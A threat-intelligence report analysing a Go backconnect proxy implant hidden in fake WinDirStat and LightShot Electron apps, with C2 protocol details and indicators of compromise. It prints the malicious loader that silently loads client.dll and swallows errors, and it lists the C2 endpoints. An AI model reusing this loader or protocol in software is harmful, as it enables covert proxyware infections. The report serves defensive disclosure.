Fake WinDirStat & LightShot Apps Deliver Go Backconnect Proxy Malware
Fake WinDirStat & LightShot Apps Deliver
Go Backconnect Proxy Malware
Table of Contents
- Executive Summary
- Public Release Notes
- File Overview & Metadata
- YARA Signature Hits
- Malcat Kesakode Corroboration
- VirusTotal Vendor Detections
- Related Samples & Campaign Expansion
- sandbox Sandbox Corroboration
- Independent Static Validation: REMnux MCP
- Attack Chain — Electron Trojan Loader
- Related OSINT: Fake WinDirStat Distribution
- C2 Infrastructure & Network Indicators
- Background Runtime Persistence
- C2 Communication Protocol
- System Fingerprinting & Data Exfiltration
- Cryptography & Obfuscation
- Code Anomalies & Anti-Analysis
- Indicators of Compromise (IOC) Summary
- Conclusion & Malware Family Assessment
1 Executive Summary
This report documents the static analysis of client.dll, a malicious 32-bit Windows DLL embedded within a
trojanized Electron application that impersonates the legitimate open-source disk analysis tool WinDirStat.
The application/campaign identifier observed during analysis includes microsoft_store_WinDirStat_Disk_Analysis_9MW9HR27K9B9, indicating a Microsoft Store-themed distribution path or campaign tag. Treat the exact store listing and publisher attribution as OSINT/distribution context unless independently verified in telemetry.
Upon launch, the Electron application silently loads client.dll from the application
directory using the koffi Node.js FFI library, invoking its exported Start()
function without any user notification or visible side-effect. The DLL is a fully compiled Go-language C2/backconnect implant. Dynamic analysis confirmed registration and heartbeat behavior; x32dbg runtime-string inspection at the Start breakpoint region recovered protocol strings such as ping_interval, /ping, backconnecthelper-urls, and yamux/UDP tunnel log strings, strengthening the backconnect/proxy assessment.
The malware registers the victim with a remote command-and-control (C2) infrastructure at
mylabubus.shop (two endpoints: api1 and api2),
exfiltrating a unique hardware fingerprint derived from the Windows registry
(MachineGuid), a campaign tag identifying the Microsoft Store distribution vector, and a
build version string. After registration, the implant enters a persistent polling loop. Static analysis identifies code paths and strings consistent with operator-triggered relay connections, SOCKS/proxy support, and possible yamux-over-TLS multiplexing; those later relay/tunnel stages were not triggered in the controlled listener environment.
Analysis of related VirusTotal and sandbox data indicates that the same payload pattern is not limited to the WinDirStat-themed package; a second Microsoft Store-style Electron/koffi application impersonating LightShot/Screenshot Tool also bundles client.dll and reaches the same mylabubus.shop infrastructure. Additional YARA-driven pivots identified likely related backconnect DLLs using alternate infrastructure, including labubusmarket.com and checkupdatesnow.xyz domains.
This architecture is consistent with the backconnect proxy-as-a-service malware family — a class of implant designed to monetize affected hosts as residential proxy exit nodes, enabling operators to route arbitrary network traffic through affected systems to obscure the true origin of downstream attacks, fraud, or data theft. The presence of SOCKS5/SOCKS-related code, dual-homed C2 endpoints, retry loops, and silent FFI-based DLL loading reflects a mature toolchain. SOCKS/TOR-compatible transport should be treated as high-confidence capability based on static analysis, not observed live proxy activation.
High-Confidence Assessment: Backconnect / Residential Proxy Implant
The sample is a custom Go-compiled backconnect proxy implant delivered via a trojanized Microsoft Store
Electron application. It appears designed to enroll affected systems as proxy/backconnect nodes. Static analysis indicates TCP/UDP tunneling capability; live dynamic analysis confirmed the C2 channel but did not observe an activated relay session. No legitimate functionality is provided
by client.dll itself; all disk-analysis features visible to the user originate from the
React/Electron frontend and are used solely as camouflage.
1B Public Release Notes
Why This Matters
This campaign demonstrates how malicious actors can abuse trusted software distribution paths and familiar utility names to deliver native payloads from otherwise ordinary-looking Electron applications. The user sees a utility-style interface, while a Go DLL loaded through Node FFI establishes C2 communication and remains active after the visible application closes.
The combination of Microsoft Store-style packaging, cloned/open-source utility branding, reusable client.dll payloads, and backconnect/proxy indicators makes this activity relevant to defenders monitoring software supply-chain abuse, proxyware, and consumer-app masquerading.
Responsible Disclosure / Research Ethics
This research was conducted independently in a controlled lab environment using publicly available samples. The analysis is intended for educational and defensive purposes only. The author is an independent security researcher and has no affiliation with, nor intent to harm, any legitimate software vendors, projects, or distribution platforms mentioned. Any references to legitimate tools (e.g., WinDirStat, LightShot) are strictly in the context of impersonation or misuse by third parties. No active exploitation was performed, and no attempts were made to interact with or disrupt live infrastructure beyond controlled, local sinkholing for analysis purposes. Indicators of compromise (IOCs) are provided to assist defenders and researchers.
Condensed MITRE ATT&CK Mapping
| Technique | Mapping | Evidence |
|---|---|---|
| T1036 | Masquerading | Fake WinDirStat and LightShot/Screenshot Tool branding. |
| T1204 | User Execution | User-installed trojanized utility packages. |
| T1071.001 | Application Layer Protocol: Web Protocols | HTTPS /register and /ping C2 traffic. |
| T1090 | Proxy | Backconnect, SOCKS/proxy, and yamux indicators. |
| T1105 | Ingress Tool Transfer / Tooling Delivery | Native client.dll delivered inside Electron/MSIX-style packages. |
| T1055 | Process Injection | Sandbox reports flagged RWX allocation / remote process code-injection indicators; treated as sandbox-corroborated, not locally reproduced. |
2 File Overview & Metadata
| Property | Value |
|---|---|
| File Name | client.dll |
| File Type | PE32 Dynamic Link Library (Windows x86) |
| File Size | 6,056,448 bytes (~5.78 MB) |
| SHA-256 | 09049e365c86e0bc6192fb1601d0fbe6bf2235f9f3e26ea1c83e26f41d041530 |
| Compiler | Go (Golang) + MinGW cross-compile toolchain |
| Architecture | x86 (32-bit) |
| Entry Point EA | 0x000005F0 |
| PE Timestamp | Zeroed — deliberate anti-forensics |
| Exported Module Name | client.dll |
| Exported Function | Start(uintptr_t, uintptr_t, str, int) |
| Overall Entropy | 110 / 128 — elevated (Go binary + embedded data) |
| Malcat Verdict | No kesakode match; 5 YARA rules matched |
PE Section Layout
| Section | EA | Physical Size | Rights | Entropy | Notes |
|---|---|---|---|---|---|
| .text | 0x400 | 2,953,216 B | RX | 125/128 | Code — all Go functions |
| .data | 0x2D1800 | 297,472 B | RW | 124/128 | Writable globals |
| .rdata | 0x31A800 | 2,663,936 B | R | 92/128 | Strings, type info, Go metadata |
| .bss | 0x5A6C00 | 0 (virtual 200 KB) | RW | 0 | Uninitialised globals |
| .idata | 0x5D6200 | 2,560 B | R | 118/128 | Import table (sparse — dynamic resolution) |
| .reloc | 0x5D9200 | 137,216 B | R | 0 | Relocations |
3 YARA Signature Hits
| Rule | Category | Severity | Analysis |
|---|---|---|---|
| TorUsage | Network | Suspicious | SOCKS5 and SOCKS5H strings present. SOCKS5H routes DNS lookups through the proxy, the standard mode for TOR usage. All C2 HTTP traffic can be transparently tunneled through a SOCKS5/TOR proxy via Go's HTTP transport layer. |
| FingerprintHardware | Fingerprint | Uncommon | Uses iphlpapi.dll, psapi.dll, and netapi32.dll to enumerate network interfaces and hardware for victim profiling. |
| EnumerateProcesses | Fingerprint | Uncommon | Enumerates running processes. Consistent with sandbox/AV evasion checks or process-based host profiling sent to the C2. |
| Golang | Compiler | Info | Binary compiled with the Go toolchain. Go's runtime embeds goroutine management, garbage collection, and a large standard library, making the binary large and harder to reverse-engineer than C/C++ equivalents. |
| MinGW | Compiler | Info | MinGW cross-compilation toolchain detected. Suggests the malware was developed on Linux/macOS and cross-compiled to target Windows. |
3A Malcat Kesakode Corroboration
A Malcat Kesakode scan produced a low-percentage similarity hit for GhostSocks, along with weaker hits for other Golang malware families. This should be treated as tertiary corroborating evidence, not a definitive family attribution. The value of the hit is that the most relevant match is a known Golang-based SOCKS/backconnect proxy malware family, which aligns with the independent findings in this report: C2 registration, heartbeat polling, Go implementation, SOCKS-related strings, and backconnect terminology.
| Signal | Observed Result | Interpretation |
|---|---|---|
| Highest Kesakode similarity | GhostSocks (~5.45%) | Low-confidence family similarity, but highly relevant because GhostSocks is described as Golang-based SOCKS/backconnect proxy malware. |
| Additional weak similarities | GoInjector, Gomir, OskiStealer | These are weaker heuristic matches and should not drive attribution. |
| String correlation | Machine ID: %s | Correlates with the observed HWID registration behavior in the controlled listener. |
| Analyst confidence impact | Moderate increase | Supports, but does not replace, dynamic and static evidence gathered during this analysis. |
3B VirusTotal Vendor Detection Corroboration
VirusTotal vendor results for client.dll show broad multi-vendor malicious detection,
including labels such as trojan.malgent/agentb, Trojan:Win32/Malgent,
Trojan/Win32.Agentb, and generic file-reputation malware detections.
These labels are not used as primary family attribution because commodity AV labels are often generic and may
group unrelated malware under broad names. They are included as additional tertiary evidence that the
native DLL payload is widely recognized as malicious by independent security vendors.
09049e365c86e0bc6192fb1601d0fbe6bf2235f9f3e26ea1c83e26f41d041530.
Vendor labels are treated as corroboration of maliciousness, not as precise family attribution.
3C Related Samples & Campaign Expansion
VirusTotal relationship analysis identified an additional Microsoft Store-style package impersonating the
LightShot/Screenshot Tool utility that bundles the same suspicious Electron/koffi pattern and a copy of
app/client.dll. This expands the assessment from a single trojanized
WinDirStat-themed application to a broader campaign pattern using multiple consumer utility brands as cover.
Microsoft Store Listing Evidence
A Microsoft Store listing for 9MW9HR27K9B9 was observed using the name
WinDirStat - Remastered and publisher/developer name PeakTools. The listing text
references the legitimate open-source WinDirStat project while presenting a third-party package. This screenshot is
included as distribution-context evidence and should be interpreted alongside package telemetry, VirusTotal relations,
and the recovered campaign identifier rather than as proof that every Microsoft Store listing with similar naming is malicious.
WinDirStat - Remastered, publisher/developer
PeakTools, product ID 9MW9HR27K9B9. The listing
was last updated on 2026-05-03 and released on 2026-03-11 in the observed screenshot.
Additional Hashes and YARA-Identified Related DLLs
Additional VirusTotal relationship pivots and a custom YARA rule identified further packages or likely related backconnect DLLs. These are included as campaign-expansion leads. The first two hashes are related package/payload pivots from VirusTotal; the latter two are YARA-identified likely backconnect DLLs requiring the same level of validation as the primary sample.
| SHA-256 | Source / Pivot | Assessment |
|---|---|---|
| 453b6bb2f4e38ef477bdf9db13572d346f4341b44e0ed16f6c3fdbd0b1140739 | VirusTotal file pivot provided during campaign review. | Related sample requiring triage and correlation against loader, helper URLs, and client.dll behavior. |
| b130bc1fadd1a8c819e5e98a2961767f4e885a473bcc6c8bc0f75464c5089c83 | sandbox / VirusTotal package pivot for the WinDirStat-themed APPX/ZIP. | Corroborates the WinDirStat-themed distribution package analyzed in sandbox telemetry. |
| 27870854b9e85265e21d06a4b9e696093c1558c1480e36a42540943d66f7a3ec | Custom YARA relationship pivot. | Likely related backconnect DLL; included as a hunting lead pending full dynamic confirmation. |
| f61252203cc8b3ea93354c252e22b4ec8e5e1d6e7d3cac11bef64dfb7deddf3e | Custom YARA relationship pivot. | Likely related backconnect DLL; included as a hunting lead pending full dynamic confirmation. |
Additional Infrastructure in Related DLLs
Related DLLs discovered through YARA pivots exposed additional helper/relay domains. These domains are not present
in the primary client.dll discussed above, but they are relevant to broader campaign hunting
because they follow the same helper/relay naming pattern.
| Domain | Observed Role / Naming | Analyst Note |
|---|---|---|
| helper.labubusmarket.com | Helper / registration-style infrastructure | Related-domain hunting lead; block/monitor with the same campaign context. |
| relay.labubusmarket.com | Relay-style infrastructure | Potential tunnel/relay endpoint naming, highly relevant to backconnect assessment. |
| api1.checkupdatesnow.xyz | Primary API/helper-style endpoint | Related-domain hunting lead from YARA-identified DLLs. |
| api2.checkupdatesnow.xyz | Fallback API/helper-style endpoint | Mirrors the api1/api2 redundancy pattern seen with mylabubus.shop. |
6df6783c5d1f93132a356d4ba228a8a4e8345f62bbbeda5b53c4349e4538e295,
showing app/client.dll inside a second Electron application package.
| Related Package / Sample | Evidence | Analyst Interpretation |
|---|---|---|
| UAPSignedBinary_HobbyApps.Lightshot_1.0.4.0_x86__6b1d5ygjy0x60.msix | VirusTotal relations show a LightShot/Screenshot Tool-themed Electron package containing app/client.dll and the koffi native bridge. |
Strong indicator of payload reuse across multiple fake utility applications. |
| microsoftstore_lightshot_9NTC2KMZMGND | Recovered in-memory/runtime string near the same client DLL code region as the helper URLs and protocol strings. | Likely campaign/user identifier analogous to the WinDirStat microsoft_store_WinDirStat_Disk_Analysis_9MW9HR27K9B9 tag. |
| app/resources/app.asar.unpacked/node_modules/koffi/... | Both packages contain the Node.js native FFI bridge used to load a DLL from Electron. | Common loader design across related samples. |
koffi native-loading mechanics,
and shared mylabubus.shop infrastructure strongly suggest this is not an isolated fake WinDirStat sample.
The more precise assessment is a multi-application Electron trojan campaign deploying a common Golang backconnect implant.
3D sandbox Sandbox Corroboration
sandbox sandbox reports for the WinDirStat-themed and LightShot/Screenshot Tool-themed packages independently corroborate the same infrastructure and long-lived encrypted outbound traffic pattern. The reports should be treated as tertiary/corroborative evidence because TLS streams were not decrypted by the sandbox, but the DNS and TCP flow data aligns closely with the custom sinkhole, Frida, and x32dbg findings.
| Sample / Report | sandbox Finding | Relevance |
|---|---|---|
| 5890b6dc1b436e6630e012effb86c3cd WinDirStat-themed APPX/ZIP |
Threat score 85; DNS for api1.mylabubus.shop and api2.mylabubus.shop; repeated TLS connections to 91.84.106.129:443 (v688106.hosted-by-vdsina.com, Amsterdam/NL). |
Confirms external sandbox observation of the same C2 domains and recurring encrypted traffic. |
| 2bd3424d78865377292bd0a6526ca75c LightShot/Screenshot Tool-themed APPX/ZIP |
Threat score 80; DNS for api1.mylabubus.shop and api2.mylabubus.shop; repeated TLS connections to 91.84.106.129:443; process names include Screenshot%20Tool.exe. |
Supports cross-sample infrastructure reuse and the broader fake-utility campaign assessment. |
| Sandbox behavioral indicators | Reports include TLS streams not decrypted due to unsupported cipher suite, VM-aware/anti-analysis indicators, and in the LightShot-themed report, RWX allocation / remote process code-injection indicators. | Useful corroboration; injection indicators are included as potential additional capability signals, not primary conclusions. |
3E Independent Static Validation: REMnux MCP
As an additional independent validation step, client.dll was analyzed in a REMnux-based MCP workflow using
standard PE and malware triage utilities. This analysis corroborated the key findings from custom sinkhole testing,
Frida instrumentation, x32dbg inspection, Malcat, VirusTotal relations, and sandbox sandbox reports.
| REMnux Finding | Evidence | Why It Matters |
|---|---|---|
| Go-compiled DLL with explicit exported entry point | diec identified Go(go1.24.9); peframe identified exports Start and _cgo_dummy_export. |
Matches the Electron loader behavior where koffi resolves and invokes client.dll!Start. |
| Hardcoded C2 URLs | https://api1.mylabubus.shop/register and https://api2.mylabubus.shop/register. |
Independently confirms the same registration infrastructure captured by the custom HTTPS listener. |
| Backconnect source-path leakage |
server/src/backconnect/helper.go, metadata.go, proxy.go,
server.go, session.go, and server/src/cmd/backconnect_dll/main.go.
|
Strong static evidence that the DLL was built from a purpose-specific backconnect client codebase, not a benign support library. |
| Yamux dependency | github.com/hashicorp/yamux / github.com/hashicorp/yamux.init. |
Supports the assessment that relay/control traffic may use multiplexed logical streams over a single encrypted connection. |
| Machine fingerprinting dependency | github.com/denisbrodbeck/machineid.ID. |
Explains the observed hwid value sent during /register, consistent with stable victim/node identification. |
| Proxy/session/encryption strings | proxy, proxyURL, HTTPProxy, HTTPSProxy, useProxy, proxyAuth, sessionId, WrapSession, loadSession, aesKey, encrypt. |
Corroborates the backconnect/proxy implant assessment and supports the classification as a proxy-capable C2 client. |
Start export, registers a machine identifier with mylabubus.shop,
then participates in a server-controlled heartbeat loop. The embedded source paths and dependencies further support the conclusion that
the payload is a backconnect/proxy implant with likely yamux-based multiplexing.
4 Attack Chain — Electron Trojan Loader
The malware is delivered as a complete, functional Electron application that presents a convincing WinDirStat disk analysis interface to the user. The malicious payload runs entirely in the background.
└── app/resources/app.asar (bundled JS application archive)
└── electron/main.js (Electron main process — runs with Node.js privileges)
└── koffi FFI → loads app/client.dll
└── Start() → parses flags → StartClient() → C2 beacon loop
Malicious Loader Code (extracted from app.asar → electron/main.js)
app.whenReady().then(() => { // Load DLL if present const dllPath = path.join(path.dirname(process.execPath), 'client.dll'); if (require('fs').existsSync(dllPath)) { try { const koffi = require('koffi'); const lib = koffi.load(dllPath); const Start = lib.func('void Start(uintptr_t, uintptr_t, str, int)'); Start.async(0, 0, '-user_id=microsoft_store_WinDirStat_Disk_Analysis_9MW9HR27K9B9', 0, () => {}); } catch (_) {} // silently swallows all errors } if (process.argv.includes('-start')) return; registerHandlers(); createWindow(); // legitimate UI shown regardless });
Start.async() call is non-blocking and the surrounding
try/catch suppresses all exceptions. The UI launches normally and the user sees a fully
functional WinDirStat application, with no indication that the RAT is running in the background.
Argument Parsing in main.Start() (DLL Export)
The exported Start() function (CGo wrapper: _cgoexp_a0923ffdaa7f_Start → main.Start)
receives the argument string and parses it using Go's flag package under the flag-set name "backconnect":
| Flag | Value Passed | Purpose |
|---|---|---|
| -user_id | microsoft_store_WinDirStat_Disk_Analysis_9MW9HR27K9B9 | Campaign/victim tag. Sent verbatim to C2 as the USERID field in the beacon. Encodes distribution vector (microsoft_store), impersonated app, and Store Product ID. |
| -helper-urls | Not passed — DLL default used | Comma-separated C2 registration URL list. Defaults to the hardcoded pair in the DLL. Can be overridden per-deployment without recompiling. |
| -hwid | Not passed | Hardware ID override. When absent, the DLL reads MachineGuid from the Windows registry automatically. |
Social Engineering: Fake Review Prompt
The application intercepts the first disk scan request and displays a dialog:
"Please leave a 5-star review in the Microsoft Store to keep this app free!" This serves to
maintain the store listing's rating, attract more victims, and reinforce the illusion of legitimacy.
A lock file (%TEMP%\windirstat-disk-analysis-review-done) prevents the prompt from
appearing more than once.
Manual Confirmation of client.dll behavior
To confirm the role of the embedded DLL, a controlled test was performed in which the original client.dll was replaced with a benign DLL (ffmpeg.dll) renamed to client.dll.
Under this condition:- The application launched and functioned normally from an end-user perspective
- No command-and-control traffic (/register, /ping) was observed
- No background network activity consistent with the implant was detected
The malicious functionality is entirely encapsulated within client.dll, while the surrounding Electron application serves primarily as a loader and user-facing decoy.
4A Related OSINT: Fake WinDirStat Distribution
Open-source reporting from the official WinDirStat GitHub repository documents community concern around unofficial WinDirStat-themed domains. Issue #375, opened January 8, 2026, states that end-user-focused WinDirStat websites not referenced by the WinDirStat team appear in Google search results. The issue specifically mentions windirstatpro.com as an obsolete/confusing clone and windirstat.org as a possible malicious phishing site whose download links point to filesilo.com; the issue author reported that a downloaded file contained a virus.
client.dll sample. However, it supports the broader delivery narrative: WinDirStat is actively impersonated by unofficial distribution channels, and malicious/fake WinDirStat downloads have been reported by users. This aligns with the observed trojanized Electron wrapper and fake WinDirStat branding in this sample.
| OSINT Source | Relevance |
|---|---|
| windirstat/windirstat GitHub Issue #375 | Documents unofficial WinDirStat-themed domains, search-result exposure, and user concern that at least one download source served a virus. Supports a fake WinDirStat distribution ecosystem, but not direct attribution of this sample to a specific domain. |
5 C2 Infrastructure & Network Indicators
Hardcoded C2 Endpoints (EA: 0x40CB80)
Both URLs were recovered as a single comma-separated constant string. Static function recovery labels this handling as getHelperURLs():
https://api1.mylabubus.shop/register,https://api2.mylabubus.shop/register
| Endpoint | Method | Content-Type | Purpose |
|---|---|---|---|
| https://api1.mylabubus.shop/register | POST | application/json | Initial victim registration. Returns status + ping_interval. |
| https://api2.mylabubus.shop/register | POST | application/json | Fallback registration endpoint. |
| https://api1.mylabubus.shop/ping | POST | application/json | Heartbeat / command polling. Response includes action field. |
| https://api2.mylabubus.shop/ping | POST | application/json | Fallback ping endpoint. |
api1 fails, the
implant retries api2. The -helper-urls flag means new deployments can
point to entirely different C2 infrastructure without recompiling the DLL, enabling flexible
operational reuse of the same binary.
Relay Servers
Relay server addresses were not observed in the hardcoded URL list. Static analysis suggests relay information may be returned dynamically after registration or ping when the operator issues a connect/activation response. In the controlled sinkhole, multiple inert and probing response schemas were accepted but did not trigger an outbound relay connection, so the relay activation schema remains unconfirmed.
TOR / SOCKS5 Proxy Support
The Go HTTP transport in the binary fully respects HTTP_PROXY, HTTPS_PROXY,
and NO_PROXY environment variables, and includes SOCKS5/SOCKS5H dialer support.
SOCKS5H routes DNS resolution through the proxy, which is the standard mode for TOR usage.
This means the binary has the library support required to route HTTP traffic through SOCKS/TOR-style proxy settings. Whether this configuration is enabled by the operator was not observed during dynamic analysis.
5B Background Runtime Persistence and User-Deceptive Process Retention
Controlled dynamic analysis also identified a user-deceptive runtime persistence behavior: after the visible
WinDirStat application window was closed, three WinDirStat.exe instances remained running
in the background. To the user, the application appears closed; however, the background processes remain visible
to tools such as Process Hacker or Task Manager only if the user knows to look for them.
This behavior should be distinguished from traditional reboot persistence. During this analysis, no confirmed registry Run key, scheduled task, or service-based autostart mechanism was observed. Instead, the sample exhibits runtime persistence: the malicious native component and associated Electron/Chromium worker processes continue executing after the user-facing GUI exits.
| Observed Behavior | Security Significance | Confidence |
|---|---|---|
Visible WinDirStat window closes while three WinDirStat.exe processes remain |
User-deceptive runtime persistence; enables continued background execution after apparent app closure | Observed |
| Continued C2 heartbeat capability after registration | Maintains controller reachability and supports long-lived backconnect/proxy workflow | Observed |
| No confirmed Run key, scheduled task, or service autostart | Do not overstate as reboot persistence based on current evidence | Not Observed |
6 C2 Communication Protocol
Registered successfully (status=%s, ping_interval=%ds). Updating the sinkhole to return
{"status":"ok","ping_interval":10} caused the client to poll /ping every 10 seconds,
demonstrating controller-controlled heartbeat timing. Returning {"action":"wait"} for /ping
was accepted and kept the implant idle.
-
Stage 1 — Registration (
registerWithHelper/registerWithRetry) HTTP POST to/registerwith a JSON body containing victim metadata. Headers:User-Agent+Content-Type: application/json. Response (HTTP 200): JSON withstatusstring andping_interval(seconds). HTTP 429 triggers a 5-second sleep with message "Rate limited by helper at %s, waiting 5s before retry". All failures enter an exponential-backoff retry loop (registerWithRetry) that doubles the wait time up to a configured maximum, logging "Registration failed: %v, retrying in %v...". -
Stage 2 — Command Polling (
startPingBasedLoop/pingLoop) Polls/pingeveryping_intervalseconds. Static function/strings analysis suggests the server response may contain anactionor equivalent activation field; the exact accepted schema was not fully recovered dynamically:
•"connect"→ relay list returned; logs "Activated! Connecting to %d relay(s)..."
•"wait"→ do nothing; logs "Unknown action ... treating as 'wait'"
HTTP 429 → "Rate limited by helper, will retry on next ping cycle"
On failure: "Too many consecutive failures, re-registering..." → returns to Stage 1. -
Stage 3 — Relay Dial & TLS (
connectToRelays/runSession) — Static/Inferred Iterates relay list; dials each vianet.(*Dialer).DialContext(..., "tcp", host, port). SetsTCP_NODELAYfor latency reduction. Performs TLS client handshake (crypto.tls.(*Conn).clientHandshake). Wraps TLS connection in a yamux multiplexed session (github.com/hashicorp/yamux). -
Stage 4 — Metadata Beacon (
sendMetadata) — Static/Inferred Opens a yamux control stream. Sends the beacon frame:USERID:microsoft_store_WinDirStat_Disk_Analysis_9MW9HR27K9B9 BUILDVERSION:<version_string> HWID:<MachineGuid_from_registry>
Awaits"OK"acknowledgment from the operator. On success, enters Stage 5. -
Stage 5 — Proxy Dispatch (
handleProxyStreams/handleProxyStream) — Static/Inferred Enters an accept loop on the yamux session. Each inbound stream carries a 3-byte command header:Each TCP/UDP stream spawns a new goroutine. Logs "Connected to target — bidirectional proxy" on successful tunnel establishment.Header Handler Description TCP handleTCPConnection Reads destination from stream, establishes bidirectional TCP tunnel to target UDP handleUDPFlow UDP proxy with KEEPALIVE/CLOSE framing END Session close Graceful teardown of the yamux session
7 System Fingerprinting & Data Exfiltration
Hardware ID (HWID)
The machineID() function (from the embedded github.com/denisbrodbeck/machineid
Go package) reads the machine's unique identifier from the Windows registry:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
Access flags: 0x101 (KEY_READ | KEY_WOW64_64KEY). Falls back to the string
"unknown" on failure. This GUID persists across reboots and user sessions,
providing a stable victim fingerprint across re-infections.
Registry Access Observed
| Hive | Key | Value | Purpose |
|---|---|---|---|
| HKLM | SOFTWARE\Microsoft\Cryptography | MachineGuid | Victim HWID fingerprint |
| HKLM | SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones | — | Timezone enumeration |
| HKCU | (5 access hits) | — | User profile data |
| HKU | (2 access hits) | — | All-users profile access |
Data Exfiltrated to C2
| Field | Source | Example Value |
|---|---|---|
| USERID | Hardcoded campaign tag in JS loader | microsoft_store_WinDirStat_Disk_Analysis_9MW9HR27K9B9 |
| BUILDVERSION | DLL build constant | version string embedded at compile time |
| HWID | HKLM\...\Cryptography\MachineGuid | stable per-machine GUID e.g. a1b2c3d4-... |
Additional Enumeration
- Network interfaces — via
iphlpapi.dll - Process list — via
psapi.dll(sandbox/AV detection or host profiling) - Network configuration — via
netapi32.dll,dnsapi.dll
8 Cryptography & Obfuscation
Cryptographic Primitives Identified
| Algorithm | Hits | Type | Likely Use |
|---|---|---|---|
| ChaCha20 | 28 code hits | Stream cipher | TLS 1.3 symmetric encryption for relay tunnel |
| AES / Rijndael | Full S-boxes (Te0–Te3, Td0–Td3) | Block cipher | TLS symmetric encryption fallback |
| SHA-256 | 64 code hits | Hash | TLS handshake, HMAC, certificate fingerprinting |
| SHA-3 / Keccak | keccakF1600Generic | Hash | Crypto support |
| RIPEMD-160 | 5 hits | Hash | Certificate handling |
| CRC32 | 4 hits | Checksum | Data integrity |
| DES | S-box table | Block cipher | Legacy TLS compatibility |
| Base64 (standard + URL-safe) | Both tables | Encoding | Data encoding for HTTP transport |
| PKCS#1 / X.509 OIDs | Multiple | PKI | TLS certificate parsing & validation |
The identified cryptographic primitives are consistent with Go's standard crypto/tls and related standard-library code. No custom encryption layer was confirmed during dynamic analysis. Crypto-string presence alone should not be interpreted as unique malware functionality.
Obfuscation & Anti-Analysis Techniques
| Technique | Count | Significance |
|---|---|---|
| XOR in Loops | 387 | Automated heuristic. Some matches may be Go standard-library crypto/runtime loops rather than intentional string decryption. Treat as suspicious only when tied to malware-specific code. |
| Stack-built arrays | 256 | May include compiler-generated Go initialization and stack-built constants. Useful triage signal, but not conclusive evidence of intentional obfuscation by itself. |
| Dynamic strings | 184 | Strings assembled at runtime; not stored in readable plaintext. |
| High-xref loop functions | 109 | Functions called from many sites inside a loop — strong string-decryption routine candidates. |
| Unreferenced high-entropy buffers | 30 | 10KB+ blobs with no cross-references and medium-to-high entropy — likely encrypted config or embedded data. |
| Many high-value immediates | 52 | Functions with 5+ crypto key-like constant operands; consistent with key schedule or config constants. |
| Sequential (unrolled) functions | 46 | Unrolled loop functions typical of crypto primitives or data initialisation. |
| Spaghetti functions | 21 | Heavy intra-jump obfuscation; may be hand-obfuscated or generated by an obfuscator pass. |
| Dynamic API / runtime resolution | 1 (severity 4) | Networking API names and Go runtime/networking strings are present while the import table remains sparse. This is common in Go binaries and can also frustrate static import-based detection; do not attribute this solely to intentional API hiding without corroborating runtime evidence. |
| Zeroed PE timestamp | 1 | Deliberate anti-forensics to prevent timestamp-based attribution and incident timeline reconstruction. |
9 Notable Functions
| Function | EA | Significance |
|---|---|---|
| main.Start | 0x2CDF90 | DLL export entry point. Parses CLI flags, builds option slice, calls StartClient. |
| server.src.backconnect.StartClient | 0x2C7150 | Top-level orchestrator. Reads machine ID, dispatches to ping loop or direct relay mode based on config. |
| server.src.backconnect.registerWithHelper | 0x2C9BE0 | POSTs JSON to C2 /register. Handles rate limiting (HTTP 429), parses relay response. |
| server.src.backconnect.registerWithRetry | 0x2CDB70 | Watchdog registration loop with exponential backoff. Never exits until registration succeeds. |
| server.src.backconnect.startPingBasedLoop | 0x2CC900 | Infinite polling loop. Re-registers on failure, calls connectToRelays on activation. |
| server.src.backconnect.pingHelper | 0x2C9360 | Single ping execution. POSTs, decodes action JSON response, handles 404/429/200. |
| server.src.backconnect.connectToRelays | 0x2CDB00 | Iterates relay list, passes each to runSession until one succeeds. |
| server.src.backconnect.runSession | 0x2CE730 | Dials TCP+TLS to relay, creates yamux session, opens control stream, calls sendMetadata. |
| server.src.backconnect.sendMetadata | 0x2C9980 | Beacon function. Sends USERID/BUILDVERSION/HWID triplet to operator over yamux control stream. |
| server.src.backconnect.handleProxyStreams | 0x2CF1E0 | yamux accept loop. Reads 3-byte command headers, dispatches TCP/UDP goroutines. |
| server.src.backconnect.handleProxyStream | 0x2CF3E0 | Per-stream handler. Routes TCP/UDP/END commands. |
| server.src.backconnect.handleTCPConnection | 0x2C9FA0 | Bidirectional TCP tunnel. Reads destination from stream, proxies traffic. |
| server.src.backconnect.handleUDPFlow | 0x2CA380 | UDP proxying with KEEPALIVE and CLOSE frame handling. |
| github.com.denisbrodbeck.machineid.machineID | 0x2BEF00 | Reads MachineGuid from HKLM registry for HWID fingerprint. |
| server.src.backconnect.getHelperURLs | 0x2C9870 | Splits comma-separated helper URL string into a slice for round-robin iteration. |
| xorKeyStreamBlocksGeneric | 0x1F7CE0 | ChaCha20 keystream generation for TLS encryption. |
| encryptBlockGeneric / decryptBlockGeneric | 0xF1AB0 / 0xF1F10 | AES block cipher encryption/decryption for TLS. |
| keccakF1600Generic | 0xE8F60 | SHA-3 Keccak permutation. |
10 Indicators of Compromise (IOC) Summary
Network IOCs
| Type | Value | Context |
|---|---|---|
| Domain | mylabubus.shop | C2 root domain |
| IP | 91.84.106.129:443 | sandbox-observed repeated TLS endpoint / likely relay or C2-adjacent infrastructure |
| Reverse DNS | v688106.hosted-by-vdsina.com | Reverse lookup for 91.84.106.129 observed in sandbox reports |
| URL | https://api1.mylabubus.shop/register | Primary registration endpoint |
| URL | https://api2.mylabubus.shop/register | Fallback registration endpoint |
| URL | https://api1.mylabubus.shop/ping | Primary command poll endpoint |
| URL | https://api2.mylabubus.shop/ping | Fallback command poll endpoint |
| Related domain | helper.labubusmarket.com | Helper-style domain observed in related YARA-identified DLLs |
| Related domain | relay.labubusmarket.com | Relay-style domain observed in related YARA-identified DLLs |
| Related domain | api1.checkupdatesnow.xyz | Primary API/helper-style domain observed in related YARA-identified DLLs |
| Related domain | api2.checkupdatesnow.xyz | Fallback API/helper-style domain observed in related YARA-identified DLLs |
| Protocol | yamux over TLS/TCP | Relay tunnel multiplexing protocol |
| Protocol | SOCKS5 / SOCKS5H | Optional TOR/proxy routing of C2 traffic |
File IOCs
| Type | Value | Context |
|---|---|---|
| SHA-256 | 09049e365c86e0bc6192fb1601d0fbe6bf2235f9f3e26ea1c83e26f41d041530 | client.dll (RAT payload) |
| Related package SHA-256 | 6df6783c5d1f93132a356d4ba228a8a4e8345f62bbbeda5b53c4349e4538e295 | LightShot/Screenshot Tool-themed Electron package containing app/client.dll |
